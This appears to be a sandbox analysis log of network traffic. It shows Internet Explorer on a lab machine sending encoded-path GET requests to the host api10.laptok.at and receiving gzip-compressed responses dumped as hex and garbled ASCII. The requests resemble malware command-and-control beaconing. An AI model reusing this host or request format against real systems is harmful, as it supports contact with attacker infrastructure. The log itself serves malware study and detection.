                                                                                                                                            Nov 23, 2020 12:19:08.224163055 CET318OUTGET /api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j HTTP/1.1
                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                            Accept-Language: en-US
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            Host: api10.laptok.at
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 23, 2020 12:19:09.288871050 CET331INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 23 Nov 2020 11:19:09 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a 45 a2 a3 40 14 45 17 c4 00 b7 21 0e c1 5d 66 b8 bb b3 fa fe bd 81 24 54 bd 77 ef 39 49 f4 28 f5 80 1e 1b f5 c3 d7 e8 32 b6 1e 44 19 b6 25 18 f1 73 f9 10 eb 3a 0e 2d 86 57 cb 8b 31 81 b4 a0 96 0f 75 5e f5 83 4d d7 da 30 71 34 e7 ba a8 ca e2 b8 9e 60 32 ac 30 a5 c5 d9 d4 e8 c1 cc 07 18 92 5d ca 65 a0 33 b1 0a e4 b2 29 f3 47 24 1f 9d 98 0a 61 d6 fc c0 53 b6 74 70 fb 51 3b 56 75 39 3d 85 11 28 8e 32 47 2c 62 8b 15 3c 7c 3c a0 a1 70 3f 14 6f 51 dd aa d8 c5 65 30 29 26 30 11 f2 37 54 2d 85 6a cb 07 05 62 bf 52 ba 45 74 65 c8 ea 14 84 00 1e 81 de 81 a6 75 1b 7e 23 c8 9e be 5d 2a c6 82 93 fd a0 e4 e6 13 86 5d 80 bc 85 d1 3a 12 e3 5d 62 f7 33 4e bb 09 ea 5f 35 ae 8e d3 e4 41 b3 d1 cf 54 fb 11 46 1c ef cf 70 ba a4 a6 c6 7a 1f 91 11 c4 82 55 d0 5e f2 b5 9a 7d 2d ac 71 50 ed b5 0b 0d 85 09 28 65 bb a9 9f 1e 02 7d 20 d8 3e fa 16 27 11 e4 4f 15 0d 03 11 13 75 ce 8d a4 e5 d9 39 92 d1 59 c7 20 1c ff 53 02 fc d7 9c 06 59 df fe 48 37 dd cf 6c cb 67 69 d7 6e 58 ea 35 ae 8b 5f 7c da f0 8e 46 cf 48 df 62 2a 03 b6 ac 52 7a d1 02 10 94 21 64 6f d1 38 e0 36 b1 83 77 92 46 ee 0a 58 ee 08 7e c8 24 16 c6 ba 3e f9 bf fc d1 03 35 6b f5 c2 fa dd cb 4d ad d1 df 4b 64 87 8c 1a 8e 11 93 9f f5 44 cd 94 c6 9f 1d 17 ae 42 ce e7 ae bf 27 45 6e 0e 2d 5b c9 48 94 e6 4d bf 9f 17 d2 6b 32 f8 86 9b c0 70 cd c8 ad 46 99 6d b6 69 0d 33 4c c6 77 51 f8 6d 0c 43 7f bc 2b eb 5e 56 93 a2 fa 06 8c 8a 3d 58 52 65 54 4b 10 08 0c 63 27 9f 95 78 4e 5b 1f cf 4f f7 b6 96 33 64 46 a1 d2 49 57 7b 1a e8 d8 d8 c1 28 c9 d0 bd 9c 21 bb dc 97 50 bf 67 a8 0a 56 5f 10 aa 7c 0c 14 70 b4 97 a9 ae e3 f6 9d 16 7f 25 0e 21 f7 30 c7 5d 66 38 c5 73 12 65 9b 82 90 3e d6 f4 69 b4 84 af f3 e8 c9 62 a1 fc 5b 9d 35 3a 63 45 29 ec c6 4c e1 65 32 6f 57 25 fc d6 dd 15 bd f7 c0 94 47 6a 98 99 99 6e ca 3e b1 29 a6 09 7b 09 e2 f7 15 f2 ee 48 e8 10 43 a8 7b f3 cb fe 9c 45 71 75 55 8d 95 11 e4 04 79 34 fc ea cb 22 5c c3 9f 98 e0 fb 82 63 77 17 b4 52 cb 88 da 40 13 80 7a a5 ee 04 b3 99 23 3a 95 59 28 75 b1 b3 47 80 e1 ef 5e 54 07 d4 3a 79 4f 30 42 2e 62 b4 3e 61 36 e2 e8 48 2d 5c fe aa e0 5d 14 1c 57 ed b0 ea d1 09 f5 6e 0e 26 6c e8 ad 0e b6 20 59 c4 9b 49 58 c9 1b 22 17 77 6c 95 9c c3 c7 3a a1 17 5b da 1b 21 5c 59 1d 86 0e f1 26 dd 68 05 be 47 c1 8b c8 f5 43 fd b0 cc 9d a9 12 75 dc e0 f8 1b f6 31 67 b9 27 ed 41 2a cd 9a bd 28 9c ad c3 14 f7 58 11 30 9b 61 31 25 2c ed 5e 7a 0b 6c 55 18 65 62 e1 87 89 4d d7 8a 0e e6 d1 42 6d ad 01 30 0f 08 ca 2a 27 06 66 99 30 f3 09 5b 71 7b bf 6c fc 9d a1 cc f5 03 cf 65 3a 44 19 6d b4 8f 03 86 8b 46 8a b1 ae 97 f7 65 c6 a5 32 26 39 4e 74 c2 6f 02 44 dd 71 10 7a ac 28 8c 34 1a 5b 65 09 bd 99 1f 78 14 5c 67 59 a5 1d e9 af 0f 63 a2 ac 8e 6a 6f 3d ad 43 4e d7 dd e8 b6 49 f9 eb 9d 7e 50 f0 71 ca 9b 3b dd 3a 8c ab f6 38 d9 2d 3e 8d b4 00 92 e2 30 e1 50 c7 7d 6b 41 75 1f 19 bd 35 b4 de 11 df 4a e9 37 51 ea 82 08 cf be af ca b3 71 ee a8 51 0e 6d b9 92 d4 f3 04 0e 47 2f 61 73 20 26 cd 15 f6 ba 1d 28 96 10 8f 63 0e 39 8f b3 c6 84 62 72 60 0d 14 3e c2 7c 6b 84 33 a8 d5 aa 47 3c 0b 01 6e e0 eb 15 76 2b 17 f7 03 93 75 88 bd f4 b2 ff fd 24 9c 06 5a 05 80 8a c4 7a
                                                                                                                                            Data Ascii: 2000E@E!]f$Tw9I(2D%s:-W1u^M0q4`20]e3)G$aStpQ;Vu9=(2G,b<|<p?oQe0)&07T-jbREteu~#]*]:]b3N_5ATFpzU^}-qP(e} >'Ou9Y SYH7lginX5_|FHb*Rz!do86wFX~$>5kMKdDB'En-[HMk2pFmi3LwQmC+^V=XReTKc'xN[O3dFIW{(!PgV_|p%!0]f8se>ib[5:cE)Le2oW%Gjn>){HC{EquUy4"\cwR@z#:Y(uG^T:yO0B.b>a6H-\]Wn&l YIX"wl:[!\Y&hGCu1g'A*(X0a1%,^zlUebMBm0*'f0[q{le:DmFe2&9NtoDqz(4[ex\gYcjo=CNI~Pq;:8->0P}kAu5J7QqQmG/as &(c9br`>|k3G<nv+u$Zz
                                                                                                                                            Nov 23, 2020 12:19:09.288896084 CET333INData Raw: 85 e3 a6 67 fc 37 0d ac 77 f7 2f 80 f9 11 49 5e 62 c1 3b e2 bd 33 d5 92 8d 7e 83 f5 70 9f 35 1f f3 da 9d d6 7c 5d 7b 83 7f 83 94 bc 12 20 0a 32 b4 7d 52 05 9a 53 4a fe d2 58 a4 2e c7 fa 51 db 2f a4 5b 79 10 d3 3a 78 11 d9 90 a7 0c e5 8d 28 84 73
                                                                                                                                            Data Ascii: g7w/I^b;3~p5|]{ 2}RSJX.Q/[y:x(sUjn([qd9Ba}%aXLn^1}rwmbs^(\JJ\G7i>;YD29HwCB5uGEr;)1`}gk1SW!]_0ESoz0WO C
                                                                                                                                            Nov 23, 2020 12:19:09.288908958 CET334INData Raw: a0 82 31 8e 8c d7 d4 8d c3 37 18 c7 7c fc cd 09 38 ee 62 98 9f 5d 54 c1 c8 4e d3 1b 46 8b ae 75 fd 2c 37 3f 7b 90 e1 2c 1f ba dc 58 36 3b 9d c5 c5 1d b4 9c 7c 7f 84 1d 4d 39 44 e7 98 7a 45 ff 53 e2 c6 f4 f5 aa 70 74 ac b7 1b d4 ad c1 fe 34 fb af
                                                                                                                                            Data Ascii: 17|8b]TNFu,7?{,X6;|M9DzESpt44Xki)_$t_6C<4{"9uq~OAXUZC=z|(FG FxN#1ieuLgqrDv>uOZd2Ypnh|:*'{`f}[=D:
                                                                                                                                            Nov 23, 2020 12:19:09.288919926 CET335INData Raw: 63 40 57 8b 9a eb 1f fa 5d cb ea 77 8d da df d6 a4 b2 bf 4b 00 7d 39 e7 a8 f7 de 01 f2 fc 1b 94 34 16 b2 9f 9e 14 a2 44 57 09 6b f2 bf 27 8d 71 4f a7 b9 79 b0 c7 6c 37 b3 10 11 90 cf 6c b1 04 02 a2 d8 f0 b3 ef 8a 79 d4 61 18 fd f6 fd eb 95 fe c2
                                                                                                                                            Data Ascii: c@W]wK}94DWk'qOyl7lya1='CU`A@|m8s~L)7T.]!/3t.`td}?9k7L@c**bSBOU+!"rC *fDa[eu#'<@AgeL%|l~
                                                                                                                                            Nov 23, 2020 12:19:09.288933039 CET337INData Raw: e9 93 05 ec fc 94 b9 e9 06 b2 40 83 d9 6e 33 f8 2e 52 c4 26 ac d3 2f a3 7f 31 44 e8 61 87 db b7 13 61 74 15 12 cc ca c8 30 6a bf 21 54 eb 46 81 46 09 64 13 3d 1b 0c bb 06 f5 af a2 dd 98 50 e3 44 38 5a 50 9f ae d9 8f 28 0b 18 30 16 89 b1 97 80 78
                                                                                                                                            Data Ascii: @n3.R&/1Daat0j!TFFd=PD8ZP(0xXz/a\4hb*_at8z_{eH/BP{2'Gyo"sdIL,Fw?f@Ao2^:b9 E+Qvnj5H'U'32@"QTN6`>n!S
                                                                                                                                            Nov 23, 2020 12:19:09.288944960 CET338INData Raw: 76 f0 7f 87 8a 0c 94 34 e8 a9 07 ca bf 20 85 fe f6 af 51 7f f4 65 2d 65 f2 41 29 6a 2b 71 7a 21 20 30 86 83 24 4d cf 6a b1 c7 df 11 e4 ed dc 56 0d 13 82 17 31 25 29 9d d8 b6 a1 ec 08 43 c0 00 21 32 15 e8 8b 9f 88 c7 6a 8f 4f 42 6e 95 90 01 fe d0
                                                                                                                                            Data Ascii: v4 Qe-eA)j+qz! 0$MjV1%)C!2jOBnn"|c&8+>YBU8DA27kE@PMH!8@7,EW$4NaSPG$GH%7flu3>D&2?!t~0yF!V
                                                                                                                                            Nov 23, 2020 12:19:09.328711033 CET340INData Raw: 42 c9 06 4f f4 3f a9 9f a7 e8 3d de 33 7c 5a c1 92 6e 6b a1 78 13 9d 92 1f eb 30 35 4b 22 46 bf 3e 04 c5 c2 12 68 64 93 03 e2 68 bc 83 b3 5f 2b 29 ad 24 c0 92 80 ea 55 c4 9c 9e 00 33 ee 29 cd 83 6a 47 dd 96 c5 d4 91 d3 02 4e 52 c7 df c9 67 48 5a
                                                                                                                                            Data Ascii: BO?=3|Znkx05K"F>hdh_+)$U3)jGNRgHZFFDs9f-Aer}bgVX@|XDK~HPh3@>,/al!(Cbm:[=]9QR'J'\[x|}L-c+!tA,EB:}?~3pQ2]D
                                                                                                                                            Nov 23, 2020 12:19:09.328738928 CET341INData Raw: 05 79 96 1c 24 38 8c b7 3e 8f 3b 9a 48 79 6b 00 85 da 14 10 f6 b9 bf 24 39 fe 7c 01 52 e1 44 f3 e8 1c f1 1b f1 6a 0b dc a0 10 5f 5a e7 3f 01 f1 f0 5e 89 a5 b0 73 13 3d fb 53 06 b3 fd 1d 46 c1 79 c2 fc b6 e4 95 0b 37 66 99 71 fb 67 99 ed 19 85 d4
                                                                                                                                            Data Ascii: y$8>;Hyk$9|RDj_Z?^s=SFy7fqgW6C!@S.SI~~>KKCM4Fhj;/s?<8v(bVH75Z@<;c/{"O#_D@k0) I{I=\f:* w<i(
                                                                                                                                            Nov 23, 2020 12:19:09.328756094 CET342INData Raw: d1 1b ca c2 fd fb 0b 46 3d 84 dc 21 c5 02 2b 1b 43 8e dc 04 76 51 22 d9 0c 20 4b a2 5d 40 37 e5 ef cc 50 df 42 2a 9d 25 43 06 7e 72 9b b7 e1 00 bb 05 88 00 7d 8b 88 f3 f9 d1 c2 0e 9e 55 37 96 3d b4 cf 27 c1 eb 01 c2 f5 71 8f a4 cb f2 69 28 22 29
                                                                                                                                            Data Ascii: F=!+CvQ" K]@7PB*%C~r}U7='qi(")e"e\%L5L}6t".,>`3"spk3gNVC_A=N9pX`@@|4~EkFU5C;wx]$Z"[pA(pZ
                                                                                                                                            Nov 23, 2020 12:19:09.328778028 CET344INData Raw: f4 c9 40 5e 78 81 4b cf 0b e4 19 4c ed bc a8 69 98 3e b2 c6 40 16 60 93 9b e2 97 32 cc d8 f6 e4 6b 61 8c b0 57 a9 99 83 b0 32 a9 41 9f 3e 44 6f 87 6b db 84 41 64 42 7e c4 51 b6 41 30 46 1c 3a a0 47 4a 63 a5 24 3f 1c 5b 65 d1 65 53 1b e2 49 67 03
                                                                                                                                            Data Ascii: @^xKLi>@`2kaW2A>DokAdB~QA0F:GJc$?[eeSIg7y\YNZY`~He< gcGp13ulJ=o&}^|)vxjU@(2c>:<wVPGbsW,v:Z`x$Ozv=.BBZQ
                                                                                                                                            Nov 23, 2020 12:19:09.550035954 CET345INData Raw: 23 c3 3a b6 36 48 ad 53 8f 50 9d 6e 5e 7e 40 19 d7 84 ee e9 af 04 a3 7f 5e 52 c1 f8 51 68 22 8f c7 ca 0d 08 ec d6 7f f3 c1 f4 bd 95 f8 83 cc 8d 8d 67 9e 7f ac 74 ac 0c 15 91 af 25 e5 58 7a 03 7b 9f bc d9 9b ca 76 f1 5b cb 7f 07 73 76 94 ab 05 6f
                                                                                                                                            Data Ascii: #:6HSPn^~@^RQh"gt%Xz{v[svooE,<Y;//H{V1_:nO<!hN8.iOFF[jv)^{IQ,>x$]sA35T<'/h%_x.>]*pnO}@


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            1192.168.2.44973347.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 23, 2020 12:19:11.081012964 CET545OUTGET /favicon.ico HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Host: api10.laptok.at
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 23, 2020 12:19:11.865336895 CET554INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 23 Nov 2020 11:19:11 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            2192.168.2.44973847.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 23, 2020 12:19:13.860515118 CET574OUTGET /api1/HCmdTF9ssS2xPQYmTqbko/QSaXs_2BFCMwb9WJ/TzYhMx5eXoG7h0c/n88BmwhZe9ijt5oT_2/Fx6667KDX/SidvZb9thKv8bvTE_2Bd/bd09MXr6sZJK_2B0qyS/ttipC86Fa_2BhWcPHgFDgb/FLKb2aUcMy7Ws/o6qiRO8c/nNeTK_2FSOWylkimJJN1ZPK/7CLWQhh7_2/FsBidPde1di4dmq_2/FoYbJ3dZ5_2F/jbxcTO3nXc9/SExxKRXHJLHHvI/_2BhbueQTaU2MuoAANkGM/Ms1_0A_0DsFCZtvF/RsiXqTx0w_2B7BA/8qwDi436YGxlKYNqBk/I9GfQ7ay9/1WHi9CeL/hOQKKrEqdJo6/k HTTP/1.1
                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                            Accept-Language: en-US
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            Host: api10.laptok.at
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 23, 2020 12:19:14.887379885 CET587INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 23 Nov 2020 11:19:14 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b 47 72 83 40 10 45 0f c4 82 20 e2 92 9c 73 66 07 22 83 c8 f9 f4 c6 3b 97 5c 25 31 33 dd fd df 1b d9 fd 0f 4d 67 52 5b 13 88 1d da dd fd 12 ea 33 3f 79 9f 7e 1c ee ec 64 f7 a8 b1 56 2e 58 e4 d2 b1 5e 6e 68 04 3b 6c 71 16 0d 81 a1 3b 93 88 82 cb db 3f 44 9f 0d 98 f7 cc 22 c9 c5 39 63 ee 7b 48 08 e1 2a 4c 92 42 e1 df cd aa 2d 10 b7 1b 79 0b 83 9f eb 86 dd af 2f 3e cc de 2f 40 8e 7e 6e 07 1a 67 a1 83 b4 2d 06 d9 11 69 00 cc c9 fb 44 fa 52 cd 08 fa 69 d2 f7 0f cc 0d 81 cf 53 c2 74 31 4f 0b a5 8f d9 e6 8a 7c 04 17 6f 0c 71 7e cf 1a 5e 90 fa b4 63 6e e3 29 47 ed e8 df 35 22 1e ae 6a 50 76 05 e3 95 4e c1 51 54 b3 31 33 be c4 87 36 5a 40 3c 29 e7 a1 f3 2a 5e 10 30 03 be f8 45 8f c7 40 8f 22 29 06 68 25 9c 49 aa 7f 09 57 4c ea af b3 3c ed a7 18 41 cb 0a bf a8 38 e7 64 e4 2b 1d 65 4a 26 95 d4 03 6f 03 7a cf a1 87 a2 f7 93 83 c3 10 22 04 8c 74 58 50 ce f0 d7 71 3c 19 d7 47 4e 0b 67 b3 bd f5 c8 6d b1 16 76 e8 96 da e1 87 41 77 fc 3c 71 8a fe 09 7a 93 48 81 65 f0 dc df af a2 10 9e 4e ee 1d 02 24 36 f8 d8 21 f5 40 9b 6e cc 22 94 c4 3f 94 51 19 34 09 33 d1 6c d8 6c ca 0f 1a de 13 a3 b4 26 30 26 43 0b 22 c8 5f b8 a9 cf 06 fc 02 1c a1 21 15 c8 e0 15 47 87 58 f9 d4 7c 1c 5e 64 20 0c e5 27 9b 31 7a af cb f4 1a 37 a4 ed d7 fc 21 e1 67 6b f0 a3 75 72 4c f1 d9 bc 02 e1 34 9a 3d 11 66 3d 8c 2b a1 79 a4 2b 2a 6b be 92 1b 74 86 20 9b bb 9d 8c 5a a9 d9 b2 97 69 5f 3f f0 13 9b ca 02 d4 e5 52 cf fc 7d a6 e4 10 85 e4 7c cc 8c ab 7e cc dd 08 99 90 25 1e fd 83 c5 7c 07 39 ee 47 56 b8 02 68 1b ce 3c e4 67 e5 54 b5 d9 97 ea 53 56 42 51 35 4a a8 ef fe c9 8f 82 95 67 a5 a9 b1 fb 3e 1b 09 0b 40 88 cc 79 f1 12 a1 40 cb cf 09 3e 1e 00 2d 65 e1 98 30 71 dc 33 2d 66 a7 3d 78 a5 62 81 1d 8f 30 b1 8e d1 53 d2 3e dd c5 7e 03 95 0e 7c 1e 4d 91 3d b7 c3 25 5e 2f 02 d3 74 e1 84 46 26 cd 07 c4 0b 57 be 6a c3 80 cb dc d7 ee 8e aa 91 0f f2 d1 67 2b a9 ce 25 41 9f b9 91 65 1f 83 6d 0b 84 8f 7c ea 22 ba 6e 81 56 50 b3 23 4c 4f 78 d7 33 f2 3b 72 5e c8 d7 3c 01 de df 5e 9f 5b 25 7c 4b c0 13 8d 87 40 5c 02 86 30 87 92 ca 92 0c ca 13 1e 95 86 9e 64 0f 01 10 0c ed 9c a1 e1 38 c2 d7 06 d8 3e ab a0 60 33 9e 90 b6 ef f3 fb 5e ae 88 c2 5b 41 a2 b4 bc 4f 1f 15 e3 34 2c 25 fe d8 4b 08 be e0 16 65 83 ff e1 db 69 74 82 e3 47 d9 ce b1 01 4a 5b 24 5a 35 79 f7 b3 79 5c 13 19 d2 74 1b 29 9e 6a 48 be 1f 3c ef 96 45 88 02 9e fd a0 dd 61 fa ee 5a 6d ce 27 68 65 ec 43 ad ae 69 7e 33 14 91 89 33 b5 52 7a 1f ce d3 10 00 18 91 92 de 1a 4d 71 64 8d 46 a1 42 a6 3b 8e c5 7e 90 0d 2e c2 5f 78 02 3b 5e e1 06 e6 5f 1c 25 49 cd 8a c2 f5 57 22 f5 06 e2 9f 58 db 21 9a ac 7a 7b 08 25 19 3f 11 f7 fe 00 44 c0 93 e3 84 b6 03 1a 18 10 7e fd b8 68 15 c8 41 09 c1 f5 3a 3e 35 0c 15 83 a6 f1 5f 21 49 a1 ba 09 19 7a b8 2a 91 88 db 1a 77 ad 54 4e 1b 35 dd 0f 08 3e c0 de 40 0f a3 4d 2b 86 87 f7 bb d4 cd c7 b5 a1 2b 6f c7 9f b6 71 31 71 7e 33 e1 fe d0 b0 6e bb a7 eb aa 42 a7 bb 19 da 99 20 3b a3 24 48 c7 12 d5 72 b7 70 27 f7 3c 1c 95 01 f6 f8 5d f9 22 00 95 88 17 59 3a a0 37 88 00 5a 41 9e 5c 27 37 82 33 39 57 39 dd d7 87 4e b6 d1 fe c1 93 ce be b9 28 93 a4 7e 9b 52 b7 c6 2e 74 03 33 49 db c4 c8
                                                                                                                                            Data Ascii: 2000Gr@E sf";\%13MgR[3?y~dV.X^nh;lq;?D"9c{H*LB-y/>/@~ng-iDRiSt1O|oq~^cn)G5"jPvNQT136Z@<)*^0E@")h%IWL<A8d+eJ&oz"tXPq<GNgmvAw<qzHeN$6!@n"?Q43ll&0&C"_!GX|^d '1z7!gkurL4=f=+y+*kt Zi_?R}|~%|9GVh<gTSVBQ5Jg>@y@>-e0q3-f=xb0S>~|M=%^/tF&Wjg+%Aem|"nVP#LOx3;r^<^[%|K@\0d8>`3^[AO4,%KeitGJ[$Z5yy\t)jH<EaZm'heCi~33RzMqdFB;~._x;^_%IW"X!z{%?D~hA:>5_!Iz*wTN5>@M++oq1q~3nB ;$Hrp'<]"Y:7ZA\'739W9N(~R.t3I
                                                                                                                                            Nov 23, 2020 12:19:14.887404919 CET588INData Raw: ec b7 8d bd 97 da 8c bb 1b d2 2a 72 3b 7c e6 08 ce 5a 95 3a b9 f1 0a 19 27 4a 04 c8 8b a7 81 d7 d2 8d 9d ae 27 24 9c ea 2e 98 42 8a c2 38 27 a4 20 91 99 c0 3f 6b 39 41 b3 ab 0b 5b a8 d0 ec 33 57 f2 6a c9 84 dc 75 eb 63 18 5c c1 d1 43 aa 60 0a cf
                                                                                                                                            Data Ascii: *r;|Z:'J'$.B8' ?k9A[3Wjuc\C`&PgkDE7R)[|[F"&yk9Y'gLmxpyKBvve&OucV:d `7)msblng;v#}"15C"Q}ID6&|:Z^3
                                                                                                                                            Nov 23, 2020 12:19:14.887420893 CET590INData Raw: 9e a3 f4 c0 e9 f4 f8 9c a2 36 f3 1b 79 1e 22 f9 f5 21 18 fc aa 9c de 79 d8 f5 29 6c b0 9d dd 62 95 63 54 be b4 92 a0 30 40 d4 2f 36 a6 a7 38 b4 93 65 3d d8 37 0b a2 e6 6f 8d ee 5f 74 6e f7 37 49 4d e7 23 75 6c db c3 11 8e 83 98 92 12 31 bf ff 30
                                                                                                                                            Data Ascii: 6y"!y)lbcT0@/68e=7o_tn7IM#ul10-:JNkJrPQS,$6H=[Tmzw=)r`nDXT9.-Moa%pl\E$Dm\$`Mr&M.
                                                                                                                                            Nov 23, 2020 12:19:14.887439013 CET591INData Raw: 2b 33 bc 79 1f d2 da 47 92 2c 48 70 b8 be 78 6c 91 ad 28 50 89 c5 cd a2 26 08 26 1c 5d 65 5f a4 cc 39 99 46 16 2d 3f e7 3e 3f cd e1 c7 92 8a 17 c7 e0 fb 2e 16 65 4c 3c dc 42 1d f5 a1 7f 82 1b e5 73 76 03 e3 b7 f4 46 e3 74 bb 62 39 2d a3 72 3b 78
                                                                                                                                            Data Ascii: +3yG,Hpxl(P&&]e_9F-?>?.eL<BsvFtb9-r;xZ2DR#>SJ+Wk.XwsQ($Bh=x'IH&(sv+U1kVoPPi7qvXa9u_oI&{EM{A|!05V*
                                                                                                                                            Nov 23, 2020 12:19:14.887454987 CET593INData Raw: cf e5 60 4c ca 44 28 c9 fd c0 63 16 a4 8b b3 88 2b cf 3e df e2 2c be f4 81 47 e8 92 07 b0 9e 23 ed 77 97 16 12 e1 5c 58 1e 86 16 0b a7 d0 90 92 4a 56 3e 3a 10 a2 a6 4e 07 45 96 0d c5 67 c9 23 6c 2a bb fe e2 b1 0b 9d bf 78 fa be 7b ce 1d f5 64 5c
                                                                                                                                            Data Ascii: `LD(c+>,G#w\XJV>:NEg#l*x{d\8UFZfY+OTnY48kue/4_S+B\&R0UoO{iPmSe2/>/%e^b9;Uy_LURL;;^EH6!Rf4A
                                                                                                                                            Nov 23, 2020 12:19:14.887469053 CET594INData Raw: bb 93 46 ce a3 06 5e 54 2e d9 7b 03 e9 0f ba 61 e1 db aa 95 1b 26 c5 c6 de 95 ab 8e 82 b3 cc 28 19 c2 01 ff e6 59 5c a7 fa b5 a9 de 8d 78 51 e1 99 34 2d 9b d1 64 d1 76 2d e0 86 04 fa dc b5 74 1f 7a f1 44 46 3f 9b 73 48 fc 14 d6 3d d9 be ba 6a 06
                                                                                                                                            Data Ascii: F^T.{a&(Y\xQ4-dv-tzDF?sH=j-@*PyF#:"f*m~CswD;_m8OmMU;eG*_qNl[N.cMdWZKe:\Ixu{o:['L}o}#A
                                                                                                                                            Nov 23, 2020 12:19:14.931489944 CET595INData Raw: a2 61 d8 e6 47 91 ea 97 c8 50 b3 0b f0 66 14 17 f2 cb bf 10 6d cd e5 2e 10 0e 0c d1 74 5e ee 60 fd 73 14 22 57 b4 2e af 75 e4 e9 c9 ad 2b 4c 40 08 ef 2e fa 35 b4 3f ba 31 30 b2 66 23 c6 c3 6b 33 8b 08 83 c4 e0 bd 51 8a bd d9 c5 38 6a 80 cb 71 b9
                                                                                                                                            Data Ascii: aGPfm.t^`s"W.u+L@.5?10f#k3Q8jqNY6c&_yPUR(Dq]|JV1y>sS~{G`k_^,3'{84>HBDQ }{^<7q_1[X[8_%(f
                                                                                                                                            Nov 23, 2020 12:19:14.931524992 CET597INData Raw: 51 09 b4 26 f2 e3 46 eb b3 b5 97 3b 38 12 cd 7b 88 1b f4 b7 6f 36 5a f4 3b 50 9a e0 90 ed 7b e2 0a c2 f8 14 ab 19 bd 81 f1 a2 4b 54 97 3f 05 55 fa 70 cb 79 d9 7d d4 5e 5f 07 59 2f 29 11 43 e4 97 76 f5 13 59 fd 47 57 c5 b1 20 b4 4c 66 ef 91 17 a5
                                                                                                                                            Data Ascii: Q&F;8{o6Z;P{KT?Upy}^_Y/)CvYGW Lfzst-"_>,A6`n5#gP[>!,n;D&|Z3'(?_?Ew93E2|TE<XN,eKdkRdrOt)?.
                                                                                                                                            Nov 23, 2020 12:19:14.931535959 CET598INData Raw: 0d 88 c0 80 6b 33 3b 6e d2 33 43 fe 1d a4 da f8 64 7e 8f 7a 0e 25 31 25 be d6 33 ba 12 54 29 40 03 1f ca 08 6b d4 d6 32 1a 53 4c 88 e2 dc 28 1d 3d e5 74 bd ef 73 e3 43 d0 06 1f 8e 48 bb 3a 6e cf 36 21 a4 15 e9 c0 8a 32 6f 3c 58 6f 90 df 98 02 33
                                                                                                                                            Data Ascii: k3;n3Cd~z%1%3T)@k2SL(=tsCH:n6!2o<Xo3B"tkX[@y1L~l\?v[6Hb;4G0!Aljs6O/$Wd2V"}`7DEB}PQx88[7] [Q'RP
